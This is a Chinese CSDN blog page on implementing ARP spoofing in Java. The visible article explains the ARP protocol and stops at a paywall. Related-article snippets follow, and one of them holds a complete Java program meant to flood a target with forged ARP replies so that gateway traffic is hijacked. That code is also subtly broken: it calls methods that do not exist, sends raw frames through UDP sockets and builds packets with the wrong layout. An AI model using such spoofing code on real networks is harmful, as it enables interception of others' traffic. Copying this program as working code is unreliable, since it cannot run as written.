基于JAVA的ARP欺骗的程序实现

最新推荐文章于 2022-12-20 23:20:39 发布
VIP文章 最新推荐文章于 2022-12-20 23:20:39 发布
阅读量4.1k 收藏 7
点赞数
分类专栏: 网络安全 文章标签: 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SUNyanyingjie/article/details/53039588
版权
       在实现ARP欺骗之前,我们必须知道什么是ARP。
       在局域网当中,当主机或其它网络设备有数据要发送给另一个主机或设备时,它必须要知道对方的IP地址,但仅仅有IP地址是不够的,因为IP数据报文必须封装成帧才能通过物理网络发送,因此发送站还必须有接收站的物理地址,所以需要一个从IP地址到物理地址的映射。ARP就是实现这个功能的协议。
       我们通过一个简单的例子来解释一下ARP在局域网中的运作。

       1.假设现在有一个主机A和一个主机B,二者处在同一个局域网当中。当主机A需要和主机B进行数据通信的时候,主机A会在自己的ARP缓存中查找是否有与主机B对应的ARP表项。

       2.如果A在自己的ARP缓存当中找到了与主机B对应的ARP表,主机A直接利用ARP表中的MAC地址将IP数据包进行帧封装,将数据包发送给主机B。

       3.如果A在自己的ARP缓存中没有找到与主机B对应的ARP表,则主机A将以广播的方式发送一个ARP请求,该请求中包含了主机A本身的IP地址(源IP地址)和MAC地址(源MAC地址),同时包含了主机B的IP地址(目标IP地址)。由于请求是以广播的形式发送的,所以处于该局域网的所有主机都能够检测到该ARP请求,但是只有和ARP请求中目标IP地址相同的主机才能够收到ARP请求,其余的主机都会讲该ARP请求抛弃。主机B收到由A发送的ARP请求后,会向主机A以单播的形式发送一个ARP回复,该回复中包含了主机B的IP地址(源IP地址),主机B的MAC地址(源MAC地址),主机A的IP地址(目标IP地址),主机A的MAC地址(目标MAC地址)。同时会将主机A的IP地址和MAC地址写入自己的ARP缓存当中。
       4.主机A收到来自主机B的ARP的回复后,将ARP回复中的主机B的IP地址和MAC地址添加到自己的ARP缓存
最低0.47元/天 解锁文章
SAVE_LOL
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
使用JAVA通过ARP欺骗类似P2P终结者实现数据封包监听
09-05
目前网络上类似P2P终结者这类软件,主要都是基于ARP欺骗实现的,网络上到处都有关于ARP欺骗的介绍,不过为了本文读者不需要再去查找,我就在这里大概讲解一下
java实现ARP报文的发送
10-14
java实现ARP报文的发送,通过jpcap来调用winpcap。对所用到的几个类进行了描述。
JAVA ARP欺骗 封包修改
flyer5200的博客
03-13 218
ARP(Address Resolution Protocol)既地址解释协议,主要的目的是用于进行IP和MAC地址解释的。IP是网络层协议,而MAC是被数据链路层使用。网络中两个节点要进行 通信,那么首先发送端必须要知道源和目的地的MAC地址,而网络层是使用IP地址,所以要获得MAC地址,就必须通过IP地址获取对应的MAC地址,这样 就需要使用ARP协议将IP地址转换为MAC地址,而同时为了能够...
java编程实现arp欺骗_JAVA实现ARP欺骗性的数据封包监听
weixin_29461699的博客
02-28 305
在这里,我实现了一个简单的封包截取程序,根据ARP欺骗的原理,我们所需要做的事情如下:1、 构建一个ARP Reply包2、 将该封包发送到需要欺骗的机器代码如下:Code[copy to clipboard]CODE:public class LocalListener {private final static String GATE_IP = "192.168.11.1";private f...
JPCAP——JAVA中的数据链路层控制(监听原理) ARP欺骗
mauersu
04-05 267
源:http://hi.baidu.com/leifenglian/item/763e551248b3e2453a176e8a 评: 监听原理   在详细说用JPCAP实现网络监听实现前,先简单介绍下监听的原理。  局域网监听利用的是所谓的 “ARP欺骗”技术。在以前曾经一段阶段,局域网的布局是使用总线式(或集线式)结构,要到达监听只需要将网卡设定为混杂模式即可,但现在的局域网络普遍 采用的...
ensp加kali实现arp欺骗攻击
04-21
使用arpspoof实现流量窃取与断网攻击
基于ARP欺骗内网渗透和防范.pdf
01-25
基于ARP欺骗内网渗透和防范
基于Winpcap的ARP欺骗实现
06-01
Winpcap4.0基础上开发的ARP攻击代码,仅学习网络协议之用,否则后果自负. 如有问题可以联系[email protected] 或者 登陆博客http://blog.csdn.net/xiaoy233/留言
ARP欺骗程序
05-26
用于ARP欺骗代码,一个ARP欺骗的小程序
JAVA代码实现ARP攻击
热门推荐
交换一个思想,能得到俩思想
07-05 1万+
ARP攻击原理 一台电脑通过网络访问另一台电脑的时候,在数据链路层需要知道对方的MAC地址进行真正的物理通信. 而电脑上的应用程序通常都是根据另一台电脑的IP地址来和对方建立通信,这时候就需要有一个协议将 IP地址解析到MAC地址,这就是ARP协议. 而ARP具体过程就是当需要通过IP获取一个远端的的MAC地址的时候,系统会首先检查ARP中 是否存在对应的IP地址,如果没有,则发送一个
基于JAVAARP攻击实现
12-13
本项目请用MyEclipse导入,测试的是用MyEclipse10
无网关的局域网如何获取封包_网络专题(1):局域网 ARP 欺骗原理详解
weixin_39718521的博客
12-04 297
ARP 欺骗是一种以 ARP 地址解析协议为基础的一种网络攻击方式, 那么什么是 ARP 地址解析协议: 首先我们要知道, 一台电脑主机要把以太网数据帧发送到同一局域网的另外一台主机, 它的底层是通过 48bit 的 Mac 地址来确定目的接口的, 但是我们在应用层是使用 IP 地址来访问目标主机的, 所以 ARP 的作用就是当一台主机访问一个目标 IP 地址的时候, 它为该主机返回目标 IP 主...
java arp欺骗_ARP欺骗
weixin_30382087的博客
02-13 326
ARP欺骗ARP欺骗原理局域网的网络流通不是根据IP地址进行,而是根据MAC地址进行传输。2.在局域网中某机器A要向主机B发送报文,会查询本地的ARP缓存,找到B的IP地址对应的MAC地址后,就会进行数据传输。如果未找到,则A广播一个ARP请求报文(携带主机A的IP地址Ia——物理地址Pa),请求IP地址为Ib的主机B回答物理地址Pb。网上所有主机包括B都收到ARP请求,但只有主机B识别自己的I...
java arp 攻击_用JAVA代码实现ARP攻击 | 学步园
weixin_39883079的博客
02-12 578
ARP攻击原理一台电脑通过网络访问另一台电脑的时候,在数据链路层需要知道对方的MAC地址进行真正的物理通信.而电脑上的应用程序通常都是根据另一台电脑的IP地址来和对方建立通信,这时候就需要有一个协议将IP地址解析到MAC地址,这就是ARP协议.而ARP具体过程就是当需要通过IP获取一个远端的的MAC地址的时候,系统会首先检查ARP中是否存在对应的IP地址,如果没有,则发送一个ARP广播,当某一个...
使用JAVA通过ARP欺骗实现数据封包监听
Ray
06-10 170
http://calmness.iteye.com/blog/218616
java编程实现arp欺骗,JAVA实现ARP欺骗性的数据封包监听
weixin_29100927的博客
03-22 302
如上代码实现了创建一个发送到IP为192.168.11.4的机器的ARP reply封包,其中可看到,reply包中的源IP为192.168.11.1,而源MAC则被改成当前机器的MAC地址,既 device.mac_address,这样当192.168.11.4的机器接收到该reply包后,就会刷新ARP,并且所有发送往 192.168.11.1的数据都会实际发送到当前运行该程序的机器。程序中...
如何使用Jpcap 包实现网络监听
qq_44428824的博客
02-09 470
实现的代码如下(这里提供几个重要的类) /** @(#)ARP.java ARP类 用于解析目标主机IP的地址为相应的MAC地址 @author scholar_ii @version 1.00 2007/12/10 @since JDK1.6 */ import jpcap.JpcapCaptor; import jpcap.JpcapSender; import java.util.Arrays; import java.net.InetAddress; import java.net.Inet4
发送自修改数据包进行arp欺骗
weixin_34348111的博客
11-16 772
一丶使用平台 对Microsoft Visual Studio 2010编译平台进行前期操作 项目-->**属性(alt+F7) 配置属性-->清单工具-->输入和输出-->嵌入清单-->否 配置属性-->C/C++-->常规-->附加包含目录--> 配置属性-->链接器-->常规--&...
网络安全基础——ARP欺骗
m0_57077614的博客
12-20 445
ARP欺骗 原理+实操
java实现ARP欺骗
最新发布
05-16
ARP欺骗是一种网络攻击方式,它会伪装成网络中的另一台主机,向网络中的其他主机发送虚假的ARP响应包,从而达到窃取数据、中间人攻击等目的。下面是一个使用Java实现ARP欺骗的示例程序: ```java import java.io.IOException; import java.net.InetAddress; import java.net.NetworkInterface; import java.net.SocketException; import java.net.UnknownHostException; import java.util.Arrays; public class ArpSpoofing { private static final byte[] BROADCAST_MAC = {(byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff}; private static final byte[] ARP_REQUEST_HEADER = {(byte) 0x00, (byte) 0x01}; private static final byte[] ARP_REPLY_HEADER = {(byte) 0x00, (byte) 0x02}; private static final byte[] ETHERNET_HEADER = {(byte) 0x00, (byte) 0x01, (byte) 0x02, (byte) 0x03, (byte) 0x04, (byte) 0x05}; public static void main(String[] args) throws UnknownHostException, SocketException, IOException, InterruptedException { String targetIp = "192.168.0.100"; // 目标主机IP地址 String gatewayIp = "192.168.0.1"; // 网关IP地址 String interfaceName = "eth0"; // 网络接口名 byte[] targetMac = getMacAddress(targetIp, interfaceName); // 获取目标主机MAC地址 byte[] gatewayMac = getMacAddress(gatewayIp, interfaceName); // 获取网关MAC地址 // 发送ARP欺骗包 while (true) { sendArpReply(targetIp, targetMac, gatewayIp, gatewayMac, interfaceName); Thread.sleep(1000); } } private static void sendArpReply(String targetIp, byte[] targetMac, String gatewayIp, byte[] gatewayMac, String interfaceName) throws IOException { byte[] packetData = new byte[42]; // 设置以太网头部 System.arraycopy(targetMac, 0, packetData, 0, 6); // 目标MAC地址 System.arraycopy(ETHERNET_HEADER, 0, packetData, 6, 6); // 源MAC地址 packetData[12] = 0x08; // 以太网类型 // 设置ARP头部 System.arraycopy(BROADCAST_MAC, 0, packetData, 14, 6); // 目标MAC地址 System.arraycopy(getMacAddress(gatewayIp, interfaceName), 0, packetData, 20, 6); // 源MAC地址 System.arraycopy(ARP_REPLY_HEADER, 0, packetData, 26, 2); // ARP响应头部 System.arraycopy(getMacAddress(gatewayIp, interfaceName), 0, packetData, 28, 6); // 发送方MAC地址 System.arraycopy(InetAddress.getByName(targetIp).getAddress(), 0, packetData, 38, 4); // 目标IP地址 System.arraycopy(targetMac, 0, packetData, 32, 6); // 目标MAC地址 // 发送ARP欺骗包 NetworkInterface networkInterface = NetworkInterface.getByName(interfaceName); networkInterface.getInterfaceAddresses().stream().filter(address -> address.getAddress().getAddress().length == 4).findFirst().ifPresent(address -> { try { InetAddress broadcastAddress = address.getBroadcast(); if (broadcastAddress != null) { networkInterface.sendPacket(new java.net.DatagramPacket(packetData, packetData.length, broadcastAddress, 0)); } } catch (IOException e) { e.printStackTrace(); } }); } private static byte[] getMacAddress(String ip, String interfaceName) throws UnknownHostException, SocketException { NetworkInterface networkInterface = NetworkInterface.getByName(interfaceName); byte[] hardwareAddress = networkInterface.getHardwareAddress(); byte[] ipBytes = InetAddress.getByName(ip).getAddress(); // 构造ARP请求包 byte[] packetData = new byte[28]; System.arraycopy(BROADCAST_MAC, 0, packetData, 0, 6); // 目标MAC地址 System.arraycopy(hardwareAddress, 0, packetData, 6, 6); // 源MAC地址 System.arraycopy(ARP_REQUEST_HEADER, 0, packetData, 12, 2); // ARP请求头部 System.arraycopy(hardwareAddress, 0, packetData, 14, 6); // 发送方MAC地址 System.arraycopy(ipBytes, 0, packetData, 24, 4); // 目标IP地址 // 发送ARP请求包 networkInterface.getInterfaceAddresses().stream().filter(address -> address.getAddress().getAddress().length == 4).findFirst().ifPresent(address -> { try { InetAddress broadcastAddress = address.getBroadcast(); if (broadcastAddress != null) { java.net.DatagramSocket socket = new java.net.DatagramSocket(); socket.setSoTimeout(5000); socket.send(new java.net.DatagramPacket(packetData, packetData.length, broadcastAddress, 0)); // 接收ARP响应包 byte[] receiveBuffer = new byte[28]; socket.receive(new java.net.DatagramPacket(receiveBuffer, receiveBuffer.length)); System.out.println(Arrays.toString(receiveBuffer)); // 解析ARP响应包 byte[] macAddress = new byte[6]; System.arraycopy(receiveBuffer, 6, macAddress, 0, 6); System.out.println(ip + " -> " + Arrays.toString(macAddress)); } } catch (IOException e) { e.printStackTrace(); } }); return hardwareAddress; } } ``` 这个示例程序使用了`NetworkInterface`类来获取网络接口的信息,并使用`DatagramSocket`类来发送ARP请求和欺骗包。需要注意的是,在实际使用中还需要考虑多种情况,例如网络拓扑结构、MAC地址缓存等因素的影响,否则可能会导致ARP欺骗失败。同时,ARP欺骗是一种违法的网络攻击行为,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值